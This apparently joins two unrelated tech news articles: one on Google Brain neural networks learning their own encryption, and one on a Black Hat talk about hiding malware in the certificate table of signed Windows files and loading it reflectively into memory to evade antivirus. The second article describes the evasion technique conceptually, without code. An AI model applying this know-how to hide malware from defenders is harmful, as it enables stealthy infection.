reader comments 18 Share this story Google Brain has created two artificial intelligences that evolved their own cryptographic algorithm to protect their messages from a third AI, which was trying to evolve its own method to crack the AI-generated crypto. The study was a success: the first two AIs learnt how to communicate securely from scratch. Enlarge / The setup of the crypto system. P = input plaintext, K = shared key, C = encrypted text, and PEve and PBob are the computed plaintext outputs. The Google Brain team (which is based out in Mountain View and is separate from Deep Mind in London) started with three fairly vanilla neural networks called Alice, Bob, and Eve. Each neural network was given a very specific goal: Alice had to send a secure message to Bob; Bob had to try and decrypt the message; and Eve had to try and eavesdrop on the message and try to decrypt it. Alice and Bob have one advantage over Eve: they start with a shared secret key (i.e. this is symmetric encryption). Importantly, the AIs were not told how to encrypt stuff, or what crypto techniques to use: they were just given a loss function (a failure condition), and then they got on with it. In Eve's case, the loss function was very simple: the distance, measured in correct and incorrect bits, between Alice's original input plaintext and its guess. For Alice and Bob the loss function was a bit more complex: if Bob's guess (again measured in bits) was too far from the original input plaintext, it was a loss; for Alice, if Eve's guesses are better than random guessing, it's a loss. And thus an adversarial generative network (GAN) was created. Alice, Bob, and Eve all shared the same "mix and transform" neural network architecture, but they were initialised independently and had no connection other Alice and Bob's shared key. For Alice the key and plaintext are input into the first layer of the neural network; for Bob the key and the ciphertext were input; and for Eve, she got just the ciphertext. The first layer is fully-connected, so the text and key can mix about. Following the first layer there are a number of convolutional layers, which learn to apply a function to the bits that were handed to it by the previous layer. They don't know what that function might be; they just learn as they go along. For Alice, the final layer spits out some ciphertext; Bob and Eve output what they hope is the plaintext. Enlarge / Bob and Eve's reconstruction errors during training. You can see that Eve starts to improve, but then a change in the Alice-Bob crypto method shuts her out again. The results were... a mixed bag. Some runs were a complete flop, with Bob never able to reconstruct Alice's messages. Most of the time, Alice and Bob did manage to evolve a system where they could communicate with very few errors. In some tests, Eve showed an improvement over random guessing, but Alice and Bob then usually responded by improving their cryptography technique until Eve had no chance (see graph). The researchers didn't perform an exhaustive analysis of the encryption methods devised by Alice and Bob, but for one specific training run they observed that it was both key- and plaintext-dependent. "However, it is not simply XOR. In particular, the output values are often floating-point values other than 0 and 1," they said. In conclusion, the researchers—Martín Abadi and David G. Andersen—said that neural networks can indeed learn to protect their communications, just by telling Alice to value secrecy above all else—and importantly, that secrecy can be obtained without prescribing a certain set of cryptographic algorithms. There is more to cryptography than just symmetric encryption of data, though, and the researchers said that future work might look at steganography (concealing data within other media) and asymmetric (public-key) encryption. On whether Eve might ever become a decent adversary, the researchers said: "While it seems improbable that neural networks would become great at cryptanalysis, they may be quite effective in making sense of metadata and in traffic analysis." You can read the researchers' preprint paper on arXiv. This post originated on Ars Technica UK
A new technique allows attackers to hide malicious code inside digitally signed files without breaking their signatures and then to load that code directly into the memory of another process. The attack method, developed by Tom Nipravsky, a researcher with cybersecurity firm Deep Instinct, might prove to be a valuable tool for criminals and espionage groups in the future, allowing them to get malware past antivirus scanners and other security products. The first part of Nipravsky's research, which was presented at the Black Hat security conference in Las Vegas this week, has to do with file steganography -- the practice of hiding data inside a legitimate file. While malware authors have hidden malicious code or malware configuration data inside pictures in the past, Nipravsky's technique stands out because it allows them to do the same thing with digitally signed files.

That's significant because the whole point of digitally signing a file is to guarantee that it comes from a particular developer and hasn't been altered en route. If an executable file is signed, information about its signature is stored in its header, inside a field called the attribute certificate table (ACT) that's excluded when calculating the file's hash -- a unique string that serves as a cryptographic representation of its contents. This makes sense because the digital certificate information is not part of the original file at the time when it is signed.
It's only added later to certify that the file is configured as intended by its creator and has a certain hash. However, this means that attackers can add data, including another complete file inside the ACT field, without changing the file hash and breaking the signature. Such an addition will modify the overall file size on disk, which includes its header fields, and this file size is checked by Microsoft's Authenticode technology when validating a file signature. However, the file size is specified in three different places inside the file header and two of those values can be modified by an attacker without breaking the signature.

The problem is that Authenticode checks those two modifiable file size entries and doesn't check the third one. According to Nipravsky, this is a design logic flaw in Authenticode. Had the technology checked the third, unmodifiable file size value, attackers wouldn't be able to pull off this trick and still keep the file signature valid, he said. The malicious data added to the ACT is not loaded into memory when the modified file itself is executed because it's part of the header, not the file body. However, the ACT can serve as a hiding place to pass a malicious file undetected past antivirus defenses. For example, attackers could add their malicious code to one of the many Microsoft-signed Windows system files or to a Microsoft Office file.

Their signatures would still be valid and the files functional. Moreover, most security applications whitelist these files because they're signed by trusted publisher Microsoft to avoid false positive detections that could delete critical files and crash the system. The second part of Nipravsky's research was to develop a stealthy way to load the malicious executable files hidden inside signed files without being detected. He reverse engineered the whole behind-the-curtain process that Windows performs when loading PE files to memory.

This procedure is not publicly documented because developers don't typically need to do this themselves; they rely on the OS for file execution. It took four months of eight-hours-per-day work, but Nipravsky's reverse engineering efforts allowed him to create a so-called reflective PE loader: an application that can load portable executables directly into the system memory without leaving any traces on disk.

Because the loader uses the exact process that Windows does, it's difficult for security solutions to detect its behavior as suspicious. Nipravsky's loader can be used as part of a stealthy attack chain, where a drive-by download exploit executes a malware dropper in memory.

The process then downloads a digitally signed file with malicious code in its ACT from a server and then loads that code directly into memory. The researcher has no intention of releasing his loader publicly because of its potential for abuse. However, skilled hackers could create their own loader if they're willing to put in the same effort. The researcher tested his reflective PE loader against antivirus products and managed to execute malware those products would have otherwise detected. In a demo, he took a ransomware program that one antivirus product normally detected and blocked, added it to the ACT of a digitally signed file, and executed it with the reflective PE loader. The antivirus product only detected the ransom text file created by the ransomware program after it had already encrypted all of the user's files.
In other words, too late. Even if attackers don't have Nipravsky's reflective PE loader, they can still use the steganography technique to hide malware configuration data inside legitimate files or even to exfiltrate data stolen from organizations.

Data hidden inside a digitally signed file would likely pass network-level traffic inspection systems without problems.